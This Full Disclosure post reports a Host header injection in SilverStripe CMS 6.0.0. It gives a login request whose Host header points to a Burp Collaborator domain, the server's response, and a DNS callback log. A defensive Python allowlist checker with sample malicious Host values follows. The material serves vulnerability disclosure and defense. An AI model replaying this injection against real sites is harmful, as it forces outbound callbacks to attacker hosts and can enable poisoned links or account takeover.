
Full Disclosure mailing list archives
Host Header Injection - silverstripecmsv6.0.0
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 23 Aug 2025 15:13:22 +0100
# Exploit Title: Host Header Injection - silverstripecmsv6.0.0
# Date: 08/2025
# Exploit Author: Andrey Stoykov
# Version: 6.0.0
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/08/friday-fun-pentest-series-39-host.html

Host Header Injection #1:

Steps to Reproduce:

- Login and change the Host header to Burp Collab domain
- Upon logging in the Collab would get a hit from the IP of the app

// HTTP Post Request

POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in

// HTTP Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>

// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
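A strict Host allowlist check of the kind that rejects the request shown in the report, as an added example that is not part of the original post and is not SilverStripe code. The allowlisted name `cms.example.test`, the function names and the sample requests are assumptions constructed for illustration; only the first sample's Host value comes from the report.

```python
import re

# Assumption: the site's canonical hostname; replace with your own.
ALLOWED_HOSTS = {"cms.example.test"}
# Hostname or bracketed IPv6 literal, optional numeric port, nothing else.
HOST_RE = re.compile(r"(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::\d{1,5})?")

def parse_headers(raw):
    """Return (lowercased name, value) pairs from a raw request head."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def normalize_host(value):
    """Lowercase, strip port and trailing dot; None if malformed."""
    m = HOST_RE.fullmatch(value.strip().lower())
    return m.group(1).rstrip(".") if m else None

def check_request(raw, allowed=ALLOWED_HOSTS):
    """Return (accepted, reason) for one raw HTTP request."""
    headers = parse_headers(raw)
    hosts = [v for n, v in headers if n == "host"]
    if len(hosts) != 1:
        return False, "expected one Host header, got %d" % len(hosts)
    candidates = [("host", hosts[0])]
    # X-Forwarded-Host is often trusted by frameworks behind a proxy,
    # so every value it carries must pass the same allowlist.
    for n, v in headers:
        if n == "x-forwarded-host":
            candidates += [(n, part) for part in v.split(",")]
    for name, value in candidates:
        if normalize_host(value) not in allowed:
            return False, "%s value %r not in allowlist" % (name, value.strip())
    return True, "ok"

# Constructed sample requests; "report" reuses the Host value from the post.
SAMPLES = {
    "report": "POST /Security/login/default/LoginForm HTTP/1.1\r\n"
              "Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com\r\n\r\n",
    "good": "GET / HTTP/1.1\r\nHost: CMS.example.test.:8080\r\n\r\n",
    "userinfo": "GET / HTTP/1.1\r\nHost: cms.example.test:80@evil.test\r\n\r\n",
    "xfh": "GET / HTTP/1.1\r\nHost: cms.example.test\r\n"
           "X-Forwarded-Host: evil.test\r\n\r\n",
}
```

Run the check at the first hop that terminates HTTP (reverse proxy or front controller) so that application code building absolute URLs never sees an unvalidated host.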